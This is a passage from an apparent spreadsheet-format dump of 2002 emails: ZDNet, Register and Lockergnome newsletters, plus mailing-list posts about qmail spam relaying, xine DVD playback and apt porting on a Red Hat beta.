\n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |  \n  \n**Also on Tech Update Today**  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**COMMENTARY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Handle employee relations with care**  \nERM is the latest relationship management buzzword. **Adrian Mello** helps you\nget beyond the marketing hype by weighing the merits of employee portals.  \n  \n  \n---|---  \n**Downloads**  \n![]([URL]http://www.zdnet.com[/URL] |  **How to defrag your hard drive--and speed\nup your PC**  \nLooking for a quick way to rev up a sluggish system? Try defragmenting your\nhard drive. Since the Windows defrag tool is less than ideal, **Preston\nGralla** shows you three downloads that do a better job of it.  \n  \n  \n---|---  \n**PREVIOUSLY ON TECH UPDATE TODAY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Unplugged: FBI CIO Darwin John**  \nIn the twilight of his career, an IT veteran takes on the formidable task of\ntransforming the FBI's **antiquated technology infrastructure**.  \n  \n  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks\n--products worth looking at**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **Find the\nright home network**  \nChoosing the right technology to match your networking needs is vital. Here's\nhelp in making the choice.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] reviews  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Networking**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Linksys EtherFast wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. Linksys EtherFast router  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Siemens SpeedStream router  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Wireless 802.11B Router  \n![]([URL]http://www.zdnet.com[/URL]  \n**5**. NetGear HE102 802.11a wireless AP  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nnetworking products**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n**Elsewhere on ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n\nNeed a memory upgrade? Find out with CNET's Memory Configurator.\n\nClearance Center: Get discounts on PCs, PDAs, MP3 players and more!\n\nFind out the top 10 Web services security requirements at Tech Update.\n\nBuilder.com shows you how to bring Java to the masses with Cold Fusion MX.\n\nCheck out thousands of IT job listings in ZDNet's Career Center.\n\n  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([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ontact us | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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image.com.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Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Tue, 16 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Reg Headlines Tuesday July 16</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\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Software\n\n    Preinstalled Mandrake Linux PCs go live at Walmart\n    Will the public love them?\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Confirmed: MS to ship beefed up 802.11 security in XP SP1\n    Surely not a reason to upgrade from Win2k? You amaze us...\n        [URL]http://www.theregister.co.uk[/URL]\n\nEnterprise Systems\n\n    Citrix to pink slip 10 per cent\n    Decimation, 21st century style\n        [URL]http://www.theregister.co.uk[/URL]\n\nPersonal Hardware\n\n    PC prices plummet in Europe\n    No Mercy\n        [URL]http://www.theregister.co.uk[/URL]\n\nSemiconductors\n\n    Mobile Athlon, AMD fanboy spat, Intel price cuts\n    HWRoundupFunny underdog\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    Webmaster conference held in London pub\n    We'll drink to that\n        [URL]http://www.theregister.co.uk[/URL]\n\nNet Security\n\n    Security industry's hacker-pipming slammed\n    Somebody had to say it\n        [URL]http://www.theregister.co.uk[/URL]\n\n    PGP Vuln exposed  by Outlook plug-In\n    Pretty Poor Privacy?\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    Interoute buys part of Ebone\n    Etc\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Vodafone sues Daily Telegraph for libel\n    Very short story\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Vallance recounts WorldCom war stories\n    From 'mug' to 'smug'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Archie Norman lined up for Energis as banks take over\n    Poisoned Chelys?\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Another year of telco turmoil - C&amp;W\n    Toimurl, if you're from Brooklyn\n        [URL]http://www.theregister.co.uk[/URL]\n\ne-business\n\n    E-business lives on, says EDS \n    Poke it with a stick and see if it moves\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Liberty Alliance proposes Web security standards \n    LAP dancing at the OASIS\n        [URL]http://www.theregister.co.uk[/URL]\n\nSite News\n\n    Reg Cancer Busters donates 1,000 years\n    Site News Reg SETI@Home team regroups\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Eclipse in broadband promo\n    Reg reader offer\n        [URL]http://www.theregister.co.uk[/URL]\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The Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>www.neverfailgroup.com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http://www.theregister.co.uk www.neverfailgroup.com http://list.theregister.co.uk</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: AnchorDesk &lt;Online#3.20115.09-rB-TgEkNwY9w6RRR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 01:02:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 01:02:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>AnchorDesk &lt;Online#3.20115.09-rB-TgEkNwY9w6RRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Why we're changing our publishing schedule [ANCHORDESK]</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n![AnchorDesk Weekly]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL]  \n|  ![]([URL]http://www.zdnet.com[/URL]  \nTUESDAY, JULY 16, 2002  \n![]([URL]http://www.zdnet.com[/URL]  \n|\n![]([URL]http://www.zdnet.com[/URL]\n|  ![David\nCoursey]([URL]http://www.zdnet.com[/URL]  \n---  \n  \n**Why we're changing our publishing schedule**  \n  \nDear Reader,\n\nAs of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays,\nand Fridays, instead of five days a week. The AnchorDesk Weekly newsletter\nwill continued to be published every Friday\n\nWhy are we doing this? There are several reasons, but the most important one\nis giving me a chance do more than just sit behind a desk typing all day in\norder to meet deadlines. I've been writing five columns a week for 18 months\nnow, and I'd be lying to you if I didn't admit to being more than a little\ntired.\n\nAlso, I've been on such a short leash that I haven't been able to travel or\nmeet as many people as I'd like. This new schedule means I'll have more time\nto get out, learn more, see more products, and discover new issues or trends.\nSo it should result in a more interesting and useful AnchorDesk for you.\n\nHaving additional time also means I will be able to work on several projects\nI've been assigned, including one that could bear fruit at the Consumer\nElectronics Show next January. More about that soon, once all the details are\nnailed down.\n\nFor now, the new schedule is being called a "test," which means it could turn\nout to be temporary--or maybe not. We'll run it through the end of the summer\nand see how it works.\n\nI appreciate your continued support of AnchorDesk. While the column will be\nless frequent, I will still be on CNET Radio every weekday at noon PT (or on-\ndemand streaming anytime) and hope you will join me there.\n\nSincerely,\n\nDavid Coursey  \nExecutive Editor  \nAnchorDesk\n\n  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([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areers | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;\nDate: Tue, 16 Jul 2002 00:24:03 -0500</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 00:24:03 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Windows Daily]  Dignity Shakedown</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![DDR\nMemory at Crucial.com]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.16.2002 GnomeREPORT  \n  \n---  \n  \n**Hackers and crackers respect only one thing:** strong security. Keep the bad\nguys out of your PC or network with the advanced technology that's trusted by\nmillions: ZoneAlarm Pro 3.0. This best-in-class personal firewall stops\nhackers cold, defends your online privacy,and sets up in minutes. Click here\nto download now!  \n---  \n  \nWell, it's been half a week since we released it, and we're still getting\nrecord downloads for our first FREE Gnometome. What does that mean? Simple.\nDownload all you want - we'll definitely make more. In fact, we've found a way\nto get your products and services a little bit of unlimited promotion on the\nside, too. And who couldn't use a little more traffic nowadays? Well, unless\nyour data transfer bill is already sky high (which can happen when you get\nfeatured). It's all fun and games until someone's server falls to its knees.\nWe're still sitting at #5 on Amazon. If we ever hit #1, I'll eat my hat. And,\nmind you, this hat has been sitting around for quite a while; it smells like\nfeet. You'd have to eat three sombreros just to get the same amount of\nnutrition you'd get from my hat. You're better off just going for the free\nstuff, I suppose. The next time they ask: "Do you care to Super Size that?"\nYou can respond, with dignity: "My funds are sufficient for the upgrade; I\navoided spending money on something that would have lasted longer, supported a\nhelpful cause, and not have killed me earlier." It makes sense - if you think\nabout it. The fries aren't going to eat themselves. And if YOU don't eat the\nfries, who will?\n\nPut your hunger aside for just a moment. It's time for a paragraph I like to\ncall: "Why you shouldn't sign up for DirectDSL." They went out of their way to\nsend me an unsolicited e-mail this evening. Now, I know what you're thinking:\n"How kind of them, Chris. You were just asking about DSL providers in\nyesterday's issue. They must have read your mind!" No, they must have rented a\nlist of addresses which weren't confirmed. But the fun didn't stop there. I\nreceived a message about DirectTV from yet ANOTHER marketing company. Their\neffort was indeed caught by this crafty eye, and my money will be diverted to\nother (less-spammish) businesses in the future. It's my "direct" way of\nsaying: you're not the only game in town. Anybody else care to test my\npatience? I didn't think so. My blacklist gets shared with 250,000 people from\naround the world. Oops! My Inbox just got slammed with more junk; looks like\nLycos will never get another click from me, either. See what you get when you\ntempt fate?\n\nMy good buddy, Bill, tells me that Speakeasy.net provides great DSL\nconnections. He'll even get the credit if I sign up through his affiliate\nlink! Paul Howes agrees with him, too: "Static IPs are the norm, they do not\nuse PPPoE, and they encourage people to run servers on their DSL connection.\nWhen looking at their packages, I suggest you look at the 'Home Services'\npage. They even have ADSL up to 1.5M downstream / 768k upstream, which I have\nnot seen from any other provider. And that is less than $200 a month, which is\na bargain when you start looking at the prices of a 768k SDSL line!" And\nStuart Portner is chock full of common sense: "Remember that a lot of DSL\nproviders give you the modem for free and prefer that you use theirs - at\nleast for initial setup / shakedown period." All the more fries for me, dude!\n\nSee You in August,  \nChris Pirillo  \n\n  \n\n GnomeCONFERENCE  \n  \n---  \n  \n![Heigh-Ya!]([URL]http://chris.pirillo.com[/URL]  \n$99 Pre-Registration / $150 At The Door\n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n|  | **Today's Downloads**  \n---  \nAppPlus 3.24  \nEaseBackup 3.70  \nHotCrypt 4.12  \nArles Image Web Pa 4.94  \nSmasher 2.9.12  \nThe Bat! 1.61  \nWinSafe 1.1.2  \nPrivacy Eraser 1.68  \nZero Popup 3.0  \nWinPulse 1.01  \n  \n**Company Overview v1.3 [389k] W9x/2k/XP FREE**\n\n[URL]http://www.toteboard.net[/URL]\n\n{Check your stocks} When you're doing long-term investing, the best thing to\ndo with your money is to invest and then "forget about it." Our Gnomie buddy\nBrian Stevens is the type of guy that likes to play the stock market. He's\nalways logging into E*TRADE and checking on his stocks. That's a lot of work!\nWe told him to forget about it and let Company Overview do the work. This\nExcel spreadsheet and add-in is a great way to check stocks and save the data\ninto a separate Excel spreadsheet. Brian says, "E*TRADE doesn't give me half\nthe information that Company Overview does, such as insider trades and\nfinancial trends, along with many other tidbits of information." NOTE: You\nmust use Excel 2000 or higher for the spreadsheet to operate correctly.\n\n  \n**Flexible Renamer v5.2.0 [426k] W9x/2k/XP FREE**\n\n[URL]http://hp.vector.co.jp[/URL]\n\n{Rename your files} I work with a lot of files throughout the day, and\nsometimes I end up with a desktop cluttered with useless copies and shortcuts\n- and you KNOW how I feel about clutter. I don't need a reminder that there\nare five shortcuts or six copies of something on my desktop... and that is\nwhere Flexible Renamer comes into the picture. With Flexible Renamer, I can\ncut off the "Shortcut to" and "Copy of" prefixes from all my files, making\nthem a lot easier to read. That's not all though... you can even make a .txt\nfile on your desktop into a .doc document in seconds. If you don't like your\nfilename in all caps, then just switch them to lower case and vice-versa. The\npossibilities are endless! (You know, I always wanted to change my own name\nfrom "Chris" to "Caspian Wildflowers"...)\n\nRecommend It!\n\n  \n\n GnomeCLICKS  \n  \n---  \n  \n![TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL\nNOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special\nreports, and\nmore!]([URL]http://www.lockergnome.com[/URL] | ![The\neasiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring\nquick backup, batch processing, Windows integration and SUPPORTS 15 archive\nformats \(ACE, RAR, etc\).]([URL]http://www.picozip.com[/URL] |\n![Handy Backup]([URL]http://www.lockergnome.com[/URL] |\n![Secure your\nE-Mail!]([URL]http://www.lockergnome.com[/URL] |\n![Shortcut to\nRDesk.exe]([URL]http://www.capitalintellect.net[/URL] |\n![IPCheck Server Monitor monitors a network using various protocols \(e.g.\nping, http, smtp, ftp\) and notifies the staff in various ways as soon as an\noutage occurs.]([URL]http://www.lockergnome.com[/URL] |\n![Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002,\nwithout a\nserver!]([URL]http://www.lockergnome.com[/URL]  \n---|---|---|---|---|---|---  \n  \n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Disk Investigator v1.1 [527k] W9x/2k/XP FREE**\n\n[URL]http://www.theabsolute.net[/URL]\n\n{Restore deleted files} Have you ever deleted a file from your PC, realizing\nlater that you actually needed it? Yeah, me too. Best- case scenario, I would\njust go to the Recycle Bin and retrieve my deleted file. But what if I had\nalready emptied the Recycle Bin? (Horrors!) Luckily, Disk Investigator can\ncome into play and save the day. (Yay!) With Disk Investigator, I can view\ndeleted files or directories, and restore them if necessary. I no longer have\nto wonder if I fully deleted a troublesome file... I just load up Disk\nInvestigator, and I'll know if the file is gone (with 100% certainty)!\n\nRecommend It!\n\n  \n\n GnomeWILDCARD  \n  \n---  \n  \n**Actual Title Buttons 1.3 [1.0M] W9x/2k/XP $19.95**  \nUnearthed by Michael Tretyakov\n\n[URL]http://www.actualtools.com[/URL]\n\n{Windows Explorer add-on} "Actual Title Buttons lets you add the new Minimize\nTo Tray and Stay On Top buttons to any program's title bar next to the Windows\nstandard Minimize/Maximize/Close buttons." This program is a must for anyone\nwho wants to avoid the distractions of other windows popping up over your\nactive windows. While writing this review, I am using the "Stay On Top"\ncommand for Notepad, and during this time I have already received five instant\nmessages. Why is this important? Normally these messages would pop up in front\nof Notepad and disrupt my work... but with Actual Title Buttons, I can keep\ntyping without missing those "important" instant messages. The only difference\nis that they aren't an annoyance now. The "Minimize To Tray" feature is great,\ntoo, because freeing up taskbar space is a beautiful thing... especially when\nyou don't have to close down your programs to do it.\n\nSubmit Your Thoughts | Recommend It!\n\n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**WE NEED YOU TO BE AT GNOMEDEX!** That's what your employer should be telling\nyou. Microsoft Pocket PC experts will be sharing tips on improving workplace\nproductivity with portable devices. Combined with Proxim's on location\nwireless networking solutions, a Pocket PC can keep you and your co-workers\ncommunicating no matter where you are in the building. Learn how to bring Wi-\nFI and PDA technologies together for the ultimate in portable computing.\nRegister for Gnomedex today!  \n---  \n  \n**Electricon Land**\n\n[URL]http://www.electriconland.com[/URL]\n\n{Icons for your machine} Gretchen and I are really looking forward to moving\nto our new neighborhood in a little over a month. Everything is better with a\nlittle dash of friendliness, right? Icons are no exception. All the action on\nthis website is based around a city block of Electriconland. You walk into\ndifferent stores to get different pixel art icons. Walk into Gabu's Pub and\nyou will find icons in the likeness of Pink Floyd. You won't be disappointed\nwhen you go around the corner and pick up your Avengers icons from the comic\nstore. If all this wasn't good enough then maybe this fact alone will send you\nto the street of Electriconland... all the icons are cross platform. This\nmeans you can have your new favorite icons on your Windows, Mac, and Linux\nmachine, or maybe even a different one on each. The possibilities are endless!\n\nRecommend It!\n\n  \n\n GnomeTIP  \n  \n---  \n  \nI just hate it when I try to install a program and the installation fails. I\nhate it even more when the program doesn't leave a log file to help me track\ndown the problem. Some would say I am out of luck, but as long as the program\nuses Windows Installer, then I am on Cloud Nine. Why am I so happy? Because\nfor any program that uses Windows Installer, I can turn on logging through the\nRegistry. Navigate to HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \\nWindows \ Installer. Add a new String value, double-click it, and enter the\nfollowing Value data: "voicewarmup" (sans quotes). These letters can be\nentered in any order: v = Verbose output; o = Out- of-disk-space messages; i =\nStatus messages; c = Initial UI parameters; e = All error messages; w = Non-\nfatal warnings; a = Start up of actions; r = Action-specific records; m = Out-\nof- memory or fatal exit information; u = User requests; p = Terminal\nproperties. If you add a plus, the existing file will be appended. If you add\nan exclamation mark, each line is flushed. Now, when something fails, I just\nhave to check in the "Temp" directory and look for my log files. They'll vary\nin name, but will always start with "Msi" and end with the .LOG extension. As\nalways, make sure to backup your registry before making any modifications.\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Our Tip Files  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n\n Find the Lowest Price  \n\n Suggest a Feature  \n Advertise With Us  \n The GnomeSTORE  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n Get Chris's Book  \n\n Tell a Friend About Us!  \n\n General Feedback  \n E-mail the Editor  \n The Editor's Blog  \n\n\n\nSEARCH  \n  \n---  \n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HAPPY FUN STUFF  \n  \n---  \n  \nAnd now, we see how Sprocket thinks he has a right to eat pumpkin seeds. Or,\nwould that be "pupkin" seeds?\n\nNot for the Puppy\n\n\n\n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\n![]([URL]http://images.lockergnome.com[/URL]\n\n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.  A hamburger by any other name ordinarily costs about twice as\nmuch.\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.qksrv.net http://chris.pirillo.com http://www.toteboard.net http://hp.vector.co.jp http://www.lockergnome.com http://www.picozip.com http://www.lockergnome.com http://www.lockergnome.com http://www.capitalintellect.net http://www.lockergnome.com http://www.lockergnome.com http://www.theabsolute.net http://www.actualtools.com http://www.electriconland.com http://www.lockergnome.com http://www.lockergnome.com http://images.lockergnome.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Adrian Ho &lt;aho-sw-razor@03s.net&gt;\nDate: Tue, 13 Aug 2002 23:33:32 +0800</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 23:33:32 +0800</t>
  </si>
  <si>
    <t>Adrian Ho &lt;aho-sw-razor@03s.net&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] FW: intigration with qmail</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 09:44:33AM -0500, Michael J Humphries wrote: &gt; I sent this message already and I am sorry if I am asking the wrong &gt; question or if I have been asking stupid questions but I am in an urgent &gt; time when people are using my service to spam others and I NEED to stop &gt; them quickly. Sounds like you're solving the wrong problem.  If untrusted strangers are relaying spam through your qmail server, it's a fair bet that you've seriously botched your qmail config (like forgetting to create an rcpthosts file or something). Anyway, if you insist on using razor to resolve this problem, I would suggest tossing qmail-scanner  and SpamAssassin  into the mix as well. The former provides the qmail-integration framework on which the latter does its work (including razor-check invocations). Fair warning: It'll be far more resource-intensive than simply denying relaying privileges to everyone except the folks you trust.  To find out how to do that, go to  (which, incidentally, should be your first stop for all things qmail) and search for "qmail newbie's guide to relaying". - Adrian ------------------------------------------------------- This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! [URL]http://seeker.dice.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Nick Verhaegen &lt;nick@permflux.org&gt;\nDate: Tue, 13 Aug 2002 21:45:51 +0200</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 21:45:51 +0200</t>
  </si>
  <si>
    <t>xine problems</t>
  </si>
  <si>
    <t>Hi, 	I'm no longer able to play encrypted dvd's using the xine rpm from freshrpms.  I think it was about a week ago when I last rented some dvd's, worked just  fine, but apparently since the latest xine update on freshrpms, it won't  anymore.  The output is : input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal status            of CSS decryption is unclear and we can't provide such code.            Please check [URL]http://dvd.sf.net[/URL] for more information. I'm pretty sure it worked with the previous freshrpms release... Any way of  rolling back updates ? Nick Verhaegen _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Gary Lawrence Murphy &lt;garym@canada.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 13 Aug 2002 17:40:42 -0700</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 17:40:42 -0700</t>
  </si>
  <si>
    <t>Re: A message for our times</t>
  </si>
  <si>
    <t>Gary Lawrence Murphy wrote:\n&gt; Any idea of the date of this "Hemingway Contest" claim?  Apparently\n&gt; RAID places it c.1995 but I'm just curious as to how many years this\n&gt; may have been out there.\n\nIf memory serves, RAID was in use when I joined Microsoft\nin 1992 and was still in use when I left in 1999.\n\n- Joe\n-- \nThe Combatant State is your father and your mother, your only\nprotector, the totality of your interests. No discipline can\nbe stern enough for the man who denies that by word or deed.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: iiu-admin@taint.org\nFrom: iiu-admin@taint.org\nDate: Tue, 13 Aug 2002 17:00:03 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 17:00:03 +0100</t>
  </si>
  <si>
    <t>3 IIU admin request(s) waiting</t>
  </si>
  <si>
    <t>The IIU@iiu.taint.org mailing list has 3 request(s) waiting for your\nconsideration at:\n\n	[URL]http://iiu.taint.org[/URL]\n	\nPlease attend to this at your earliest convenience.  This notice of\npending requests, if any, will be sent out daily.\n\n\nPending posts:\n     From: emailharvest@email.com on Wed Jul 31 17:08:17 2002\n    Cause: Post by non-member to a members-only list\n\n     From: abcqojps9@usa.net on Sat Aug  3 21:29:41 2002\n    Cause: Post by non-member to a members-only list\n\n     From: zigzags@oceanfree.net on Fri Aug  9 16:09:55 2002\n    Cause: Post by non-member to a members-only list</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Tue, 13 Aug 2002 15:30:46 -0400</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 15:30:46 -0400</t>
  </si>
  <si>
    <t>A message for our times</t>
  </si>
  <si>
    <t>I'm not up to forking the text, but for your entertainment:\n\n[URL]http://www.kanga.nu[/URL]\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.kanga.nu http://Golux.Com http://Apache-Server.Com http://xent.com</t>
  </si>
  <si>
    <t>To: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Tue, 13 Aug 2002 14:46:21 -0400</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:46:21 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] Stripping the SpamAssassin report</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:\n&gt; Ah...  You learn something new every day!  This would make things \n&gt; quite a bit easier.  I assume it can handle a mailbox full of mail to \n&gt; report rather than a single piece of spam from STDIN.  I'll check the \n&gt; docs on that though.\n\nUnfortunately not, it's a one at a time thing.  If it would help\nyou, I have a script that I use which handles a mbox file at a time,\nstrips the SA stuff, reports to razor, and can then do things like\nopen relay checks, reports to spamcop, etc.  It's available via:\n[URL]http://www.kluge.net[/URL]\n\n\n:)\n\n-- \nRandomly Generated Tagline:\n"But you have to allow a little for the desire to evangelize when you\n think you have good news."         - Larry Wall\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http://www.kluge.net http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 13 Aug 2002 14:43:03 +0200</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:43:03 +0200</t>
  </si>
  <si>
    <t>Re: Limbo beta 2 ?</t>
  </si>
  <si>
    <t>Once upon a time, Dave wrote : &gt; Eeeek... I hope they aren't intending to release a new RH with a new gcc &gt; which hasn't yet been released (again). Bad enough the first time, and &gt; I'm sure it gave RedHat a lot of embarrassment. Not really, it should have given more embarrassment to sloppy C++ programmers although they often were the ones bashing on gcc 2.96... &gt; FWIW, I've yet to compile apt on the gcc 3.2 snapshot in RawHide - apt's &gt; C++ makes several rather poor assumptions on what iterators are, and in &gt; addition doesn't use namespaces at all. &gt;  &gt; For non-C++ folk, this basically means it needs porting. I've got a &gt; reasonable way along, now, and I'll send a suitable patch to Connectiva &gt; or somewhere when I succeed - I can't find anything on Connectiva's site &gt; itself for this. There are already patches for this, look at the Conectiva apt-list archives, you should find them there. Also, apt 0.5 is being actively developed and already contains enough fixes to be compiled on Limbo with gcc 3.2. &gt; In addition, the rpmlib stuff has changed slightly - I've not really &gt; started on this, but it's mainly just arguments added. The rpmlib &gt; documentation seems somewhat poor, though, unless I've missed it. You can still use an apt package compiled on Red Hat Linux 7.3 as long as you install the "rpm404" package for compatibility. That's what I'm doing currently on my home Rawhide system. Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: kevin lyda &lt;kevin+dated+1029676051.792347@ie.suberic.net&gt;\nDate: Tue, 13 Aug 2002 14:07:26 +0100</t>
  </si>
  <si>
